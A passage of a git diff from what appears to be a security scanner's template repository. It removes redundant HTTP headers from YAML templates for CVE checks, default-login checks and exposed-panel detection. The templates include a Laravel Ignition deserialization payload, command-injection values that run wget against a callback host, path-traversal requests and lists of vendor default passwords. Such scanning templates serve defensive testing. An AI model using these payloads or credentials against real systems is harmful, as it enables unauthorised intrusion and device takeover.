"=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}} @@ -59,10 +47,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} @@ -70,10 +55,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}} diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml index 18d299007e..71be85cd28 100644 --- a/cves/2021/CVE-2021-31755.yaml +++ b/cves/2021/CVE-2021-31755.yaml @@ -15,12 +15,8 @@ requests: - | POST /goform/setmac HTTP/1.1 Host: {{Hostname}} - Connection: close - Accept-Encoding: gzip, deflate - Accept: */* - Origin: http://{{Hostname}} - Referer: http://{{Hostname}}/index.htmlr - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 + Origin: {{BaseURL}} + Referer: {{BaseURL}}/index.htmlr Content-Type: application/x-www-form-urlencoded module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static diff --git a/cves/2021/CVE-2021-32030.yaml b/cves/2021/CVE-2021-32030.yaml index b0db1c2b47..47b367c664 100644 --- a/cves/2021/CVE-2021-32030.yaml +++ b/cves/2021/CVE-2021-32030.yaml @@ -14,7 +14,6 @@ requests: GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1 Host: {{Hostname}} User-Agent: asusrouter-- - Connection: close Referer: {{BaseURL}} Cookie: asus_token=\0Invalid; clickedItem_tab=0 diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml index 383ea4d3fe..ae2f69e33a 100644 --- a/cves/2021/CVE-2021-3297.yaml +++ b/cves/2021/CVE-2021-3297.yaml @@ -14,10 +14,6 @@ requests: - | GET /status.htm HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive Cookie: language=en; login=1 matchers-condition: and diff --git a/cves/2021/CVE-2021-33544.yaml b/cves/2021/CVE-2021-33544.yaml index 9de55d3241..0d381d2581 100644 --- a/cves/2021/CVE-2021-33544.yaml +++ b/cves/2021/CVE-2021-33544.yaml @@ -15,9 +15,6 @@ requests: GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Cache-Control: max-age=0 - Connection: keep-alive matchers: - type: word diff --git a/cves/2021/CVE-2021-34429.yaml b/cves/2021/CVE-2021-34429.yaml index 78e663ef7f..726f1cffae 100644 --- a/cves/2021/CVE-2021-34429.yaml +++ b/cves/2021/CVE-2021-34429.yaml @@ -16,13 +16,11 @@ requests: GET /%u002e/WEB-INF/web.xml HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - |+ GET /.%00/WEB-INF/web.xml HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) unsafe: true diff --git a/cves/2021/CVE-2021-34621.yaml b/cves/2021/CVE-2021-34621.yaml index 8e59a60f28..9a97a4f4e5 100644 --- a/cves/2021/CVE-2021-34621.yaml +++ b/cves/2021/CVE-2021-34621.yaml @@ -12,13 +12,10 @@ requests: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 - X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589 Origin: {{BaseURL}} Referer: {{BaseURL}} - Connection: close -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_username" @@ -77,13 +74,10 @@ requests: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest Origin: {{BaseURL}} Referer: {{BaseURL}} - Connection: close log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In diff --git a/cves/2021/CVE-2021-35336.yaml b/cves/2021/CVE-2021-35336.yaml index 221dabdf34..6fdac1d2be 100644 --- a/cves/2021/CVE-2021-35336.yaml +++ b/cves/2021/CVE-2021-35336.yaml @@ -10,16 +10,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-35336 tags: cve,cve2021,tieline,default-login -# admin:password - requests: - method: GET path: - '{{BaseURL}}/api/get_device_details' headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Referer: '{{BaseURL}}/assets/base/home.html' Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"' + # admin:password matchers-condition: and matchers: diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index 1f3cfe52ce..6852d161cb 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -14,36 +14,24 @@ requests: - | POST /api/login HTTP/1.1 Host: {{Hostname}} - Content-Length: 44 Accept: application/json, text/plain, */* Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: en,es-ES;q=0.9,es;q=0.8 - Connection: close {"userName":"admin","password":"cs141-snmp"} - | POST /api/login HTTP/1.1 Host: {{Hostname}} - Content-Length: 44 Accept: application/json, text/plain, */* Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: en,es-ES;q=0.9,es;q=0.8 - Connection: close {"userName":"engineer","password":"engineer"} - | POST /api/login HTTP/1.1 Host: {{Hostname}} - Content-Length: 44 Accept: application/json, text/plain, */* Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: en,es-ES;q=0.9,es;q=0.8 - Connection: close {"userName":"guest","password":"guest"} diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index 6b23e91841..bb68f1a710 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -11,15 +11,9 @@ requests: - | POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 - Accept: text/plain, */*; q=0.01 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - Content-Length: 67 Origin: {{BaseURL}} Referer: {{BaseURL}}/libs/granite/core/content/login.html - Connection: close _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true diff --git a/default-logins/apache/airflow-default-credentials.yaml b/default-logins/apache/airflow-default-credentials.yaml index 50bcb9d651..c53dac75ff 100644 --- a/default-logins/apache/airflow-default-credentials.yaml +++ b/default-logins/apache/airflow-default-credentials.yaml @@ -13,22 +13,13 @@ requests: GET /admin/airflow/login HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - | POST /admin/airflow/login HTTP/1.1 Host: {{Hostname}} - Content-Length: 152 - Cache-Control: max-age=0 Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/admin/airflow/login - Accept-Encoding: gzip, deflate - Accept-Language: en-IN,en;q=0.9 - Connection: close username=airflow&password=airflow&_csrf_token={{csrf_token}} diff --git a/default-logins/apache/apache-superset-default-credentials.yaml b/default-logins/apache/apache-superset-default-credentials.yaml index 58bc528ac9..e5ff9cb506 100644 --- a/default-logins/apache/apache-superset-default-credentials.yaml +++ b/default-logins/apache/apache-superset-default-credentials.yaml @@ -13,22 +13,13 @@ requests: GET /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - | POST /login/ HTTP/1.1 Host: {{Hostname}} - Content-Length: 152 - Cache-Control: max-age=0 Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/admin/airflow/login - Accept-Encoding: gzip, deflate - Accept-Language: en-IN,en;q=0.9 - Connection: close csrf_token={{csrff_token}}&username=admin&password=admin diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml index d4e68fe296..95bc7ea11b 100644 --- a/default-logins/dell/dell-idrac-default-login.yaml +++ b/default-logins/dell/dell-idrac-default-login.yaml @@ -7,15 +7,16 @@ info: requests: - method: POST - cookie-reuse: true path: - "{{BaseURL}}/data/login" + body: "user=root&password=calvin" + headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 - Content-Type: application/x-www-form-urlencode + Content-Type: "application/x-www-form-urlencode" Referer: "{{BaseURL}}/login.html" + cookie-reuse: true matchers-condition: and matchers: - type: status @@ -24,4 +25,4 @@ requests: - type: word words: - - 0 + - '0' diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml index 78d78f3130..8c71a04c75 100644 --- a/default-logins/dell/dell-idrac9-default-login.yaml +++ b/default-logins/dell/dell-idrac9-default-login.yaml @@ -11,14 +11,8 @@ requests: - | POST /sysmgmt/2015/bmc/session HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 - Accept: application/json, text/plain, */* - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate User: "root" Password: "calvin" - Content-Length: 0 - Connection: close matchers-condition: and matchers: diff --git a/default-logins/flir/flir-ax8-default-credentials.yaml b/default-logins/flir/flir-ax8-default-credentials.yaml index 225cbfa45e..20db518552 100644 --- a/default-logins/flir/flir-ax8-default-credentials.yaml +++ b/default-logins/flir/flir-ax8-default-credentials.yaml @@ -11,13 +11,8 @@ requests: - | POST /login/dologin HTTP/1.1 Host: {{Hostname}} - Content-Length: 35 Accept: */* - X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 - Connection: closen user_name=admin&user_password=admin diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml index 496b30ecbc..7f40fcc2de 100644 --- a/default-logins/gitlab/gitlab-weak-login.yaml +++ b/default-logins/gitlab/gitlab-weak-login.yaml @@ -13,12 +13,9 @@ requests: - | POST /oauth/token HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: application/json, text/plain, */* - Accept-Language: en-US,en;q=0.5 Referer: {{BaseURL}} content-type: application/json - Connection: close {"grant_type":"password","username":"§gitlab_user§","password":"§gitlab_password§"} diff --git a/default-logins/glpi/glpi-default-credential.yaml b/default-logins/glpi/glpi-default-credential.yaml index 800d8aef3a..4af21aa850 100644 --- a/default-logins/glpi/glpi-default-credential.yaml +++ b/default-logins/glpi/glpi-default-credential.yaml @@ -12,27 +12,13 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - Upgrade-Insecure-Requests: 1 - Connection: keep-alive - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.70 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9,ru;q=0.8,uk;q=0.7 - | POST /front/login.php HTTP/1.1 Host: {{Hostname}} - Connection: keep-alive - Content-Length: 179 - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.70 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9,ru;q=0.8,uk;q=0.7 {{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}} diff --git a/default-logins/grafana/grafana-default-credential.yaml b/default-logins/grafana/grafana-default-credential.yaml index b8adcda88b..8af859b590 100644 --- a/default-logins/grafana/grafana-default-credential.yaml +++ b/default-logins/grafana/grafana-default-credential.yaml @@ -9,20 +9,15 @@ info: - https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page - https://github.com/grafana/grafana/issues/14755 -# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user. -# So make sure, not to attempt more than 4 password for same valid user. - requests: - raw: - | POST /login HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Referer: {{BaseURL}} content-type: application/json - Connection: close {"user":"admin","password":"§grafana_password§"} diff --git a/default-logins/hongdian/hongdian-default-password.yaml b/default-logins/hongdian/hongdian-default-password.yaml index 6558607526..f6098d34fa 100644 --- a/default-logins/hongdian/hongdian-default-password.yaml +++ b/default-logins/hongdian/hongdian-default-password.yaml @@ -11,26 +11,16 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close - | GET / HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close matchers-condition: and matchers: diff --git a/default-logins/ibm/ibm-storage-default-credential.yaml b/default-logins/ibm/ibm-storage-default-credential.yaml index 05ebbcc3c5..25d1a2fc6b 100644 --- a/default-logins/ibm/ibm-storage-default-credential.yaml +++ b/default-logins/ibm/ibm-storage-default-credential.yaml @@ -11,10 +11,8 @@ requests: - | POST /0/Authenticate HTTP/1.1 Host: {{Hostname}} - Origin: http://{{Hostname}} - Content-Length: 62 + Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - Connection: close j_username=admin&j_password=admin&continue=&submit=submit+form diff --git a/default-logins/iptime/iptime-default-login.yaml b/default-logins/iptime/iptime-default-login.yaml index 9924878032..da94fcec13 100644 --- a/default-logins/iptime/iptime-default-login.yaml +++ b/default-logins/iptime/iptime-default-login.yaml @@ -11,9 +11,7 @@ requests: - | POST /sess-bin/login_handler.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Referer: http://{{Hostname}}/sess-bin/login_session.cgi - Connection: close + Referer: {{BaseURL}}/sess-bin/login_session.cgi username=admin&passwd=admin diff --git a/default-logins/nexus/nexus-default-password.yaml b/default-logins/nexus/nexus-default-password.yaml index 8cde0421ba..b44818775d 100644 --- a/default-logins/nexus/nexus-default-password.yaml +++ b/default-logins/nexus/nexus-default-password.yaml @@ -11,10 +11,8 @@ requests: - | POST /service/rapture/session HTTP/1.1 Host: {{Hostname}} - Content-Length: 43 X-Nexus-UI: true Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Connection: close username=YWRtaW4%3D&password=YWRtaW4xMjM%3D diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/oracle-bi-default-credentials.yaml index 25da32202d..528c4f0c65 100644 --- a/default-logins/oracle/oracle-bi-default-credentials.yaml +++ b/default-logins/oracle/oracle-bi-default-credentials.yaml @@ -10,14 +10,10 @@ requests: - raw: - | POST /xmlpserver/services/XMLPService HTTP/1.1 + Host: {{Hostname}} Content-Type: text/xml SOAPAction: "" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Encoding: gzip,deflate - Content-Length: 771 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36 - Host: {{Hostname}} - Connection: Keep-alive diff --git a/default-logins/panabit/panabit-default-password.yaml b/default-logins/panabit/panabit-default-password.yaml index 1aff766c6b..5974205e14 100644 --- a/default-logins/panabit/panabit-default-password.yaml +++ b/default-logins/panabit/panabit-default-password.yaml @@ -12,14 +12,11 @@ requests: - | POST /login/userverify.cgi HTTP/1.1 Host: {{Hostname}} - Content-Length: 246 Origin: {{BaseURL}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAjZMsILtbrBp8VbC - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Referer: {{BaseURL}}/login/login.htm Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 - Connection: close ------WebKitFormBoundaryAjZMsILtbrBp8VbC Content-Disposition: form-data; name="username" diff --git a/default-logins/rockmongo/rockmongo-default-credentials.yaml b/default-logins/rockmongo/rockmongo-default-credentials.yaml index 2e2ec7b575..179b53aca2 100644 --- a/default-logins/rockmongo/rockmongo-default-credentials.yaml +++ b/default-logins/rockmongo/rockmongo-default-credentials.yaml @@ -11,7 +11,6 @@ requests: - | POST /index.php?action=login.index HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/x-www-form-urlencoded Referer: {{Hostname}}/index.php?action=login.index diff --git a/default-logins/spectracom/spectracom-default-credential.yaml b/default-logins/spectracom/spectracom-default-credential.yaml index 408747ba1f..e552e1251c 100644 --- a/default-logins/spectracom/spectracom-default-credential.yaml +++ b/default-logins/spectracom/spectracom-default-credential.yaml @@ -11,10 +11,7 @@ requests: - | POST /users/login HTTP/1.1 Host: {{Hostname}} - Accept-Language: en Content-Type: application/x-www-form-urlencoded - Content-Length: 98 - Connection: close data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123 diff --git a/default-logins/viewpoint/trilithic-viewpoint-default.yaml b/default-logins/viewpoint/trilithic-viewpoint-default.yaml index 6cd0fc44e6..0a09c29d59 100644 --- a/default-logins/viewpoint/trilithic-viewpoint-default.yaml +++ b/default-logins/viewpoint/trilithic-viewpoint-default.yaml @@ -13,7 +13,6 @@ requests: - | POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1 Host: {{Hostname}} - Content-Length: 65 Content-Type: application/json Cookie: trilithic_win_auth=false diff --git a/default-logins/wso2/wso2-default-password.yaml b/default-logins/wso2/wso2-default-password.yaml index 4e89966a66..70b283e8c0 100644 --- a/default-logins/wso2/wso2-default-password.yaml +++ b/default-logins/wso2/wso2-default-password.yaml @@ -13,11 +13,9 @@ requests: POST /carbon/admin/login_action.jsp HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Accept-Language: en-US,en;q=0.9 - Connection: close - Content-Length: 29 username=admin&password=admin + redirects: false matchers: - type: word diff --git a/default-logins/xxljob/xxljob-default-login.yaml b/default-logins/xxljob/xxljob-default-login.yaml index 3eb0a84a80..bab7c5bb49 100644 --- a/default-logins/xxljob/xxljob-default-login.yaml +++ b/default-logins/xxljob/xxljob-default-login.yaml @@ -12,7 +12,6 @@ requests: - | POST /xxl-job-admin/login HTTP/1.1 Host:{{Hostname}} - Content-Length: 30 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 userName=admin&password=123456 diff --git a/exposed-panels/acunetix-panel.yaml b/exposed-panels/acunetix-panel.yaml index 151404574c..4a0bcf6c89 100644 --- a/exposed-panels/acunetix-panel.yaml +++ b/exposed-panels/acunetix-panel.yaml @@ -10,8 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/#/login" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers-condition: and matchers: - type: word diff --git a/exposed-panels/atlassian-crowd-panel.yaml b/exposed-panels/atlassian-crowd-panel.yaml index 4fd18bcda4..b0a82d7536 100644 --- a/exposed-panels/atlassian-crowd-panel.yaml +++ b/exposed-panels/atlassian-crowd-panel.yaml @@ -10,8 +10,7 @@ requests: - method: GET path: - '{{BaseURL}}/crowd/console/login.action' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: - type: word words: diff --git a/exposed-panels/checkmarx-panel.yaml b/exposed-panels/checkmarx-panel.yaml index 4aa65b0e49..f860ce5306 100644 --- a/exposed-panels/checkmarx-panel.yaml +++ b/exposed-panels/checkmarx-panel.yaml @@ -10,8 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/cxwebclient/Login.aspx" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers: - type: word words: diff --git a/exposed-panels/citrix-adc-gateway-detect.yaml b/exposed-panels/citrix-adc-gateway-detect.yaml index 259215205d..e72716c96a 100644 --- a/exposed-panels/citrix-adc-gateway-detect.yaml +++ b/exposed-panels/citrix-adc-gateway-detect.yaml @@ -11,10 +11,8 @@ requests: path: - '{{BaseURL}}/logon/LogonPoint/index.html' - '{{BaseURL}}/logon/LogonPoint/custom.html' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers: - type: word words: - - _ctxstxt_CitrixCopyright + - '_ctxstxt_CitrixCopyright' \ No newline at end of file diff --git a/exposed-panels/couchdb-exposure.yaml b/exposed-panels/couchdb-exposure.yaml index 376f2370b6..ba05fd5775 100644 --- a/exposed-panels/couchdb-exposure.yaml +++ b/exposed-panels/couchdb-exposure.yaml @@ -9,8 +9,7 @@ requests: - method: GET path: - 